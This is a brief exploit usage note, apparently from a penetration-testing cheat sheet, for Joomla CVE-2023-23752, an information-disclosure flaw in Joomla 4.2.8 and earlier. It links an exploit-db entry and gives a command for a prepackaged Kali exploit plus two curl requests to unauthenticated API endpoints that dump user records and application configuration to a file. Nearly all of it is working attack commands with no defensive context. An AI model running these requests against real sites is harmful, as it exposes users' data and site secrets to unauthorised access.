Joomla CMS <= 4.2.8 CVE-2023-23752 Information Disclosure
Link: https://www.exploit-db.com/exploits/51334
Usage:
exploit.rb http://DOMAIN.LOCAL (Run the preinstalled exploit from Kali Linux)
curl http://DOMAIN.LOCAL/api/index.php/v1/config/users?public=true -o vuln.json
curl http://DOMAIN.LOCAL/api/index.php/v1/config/application?public=true -o vuln.json (Run the exploit manually with cURL)Last updated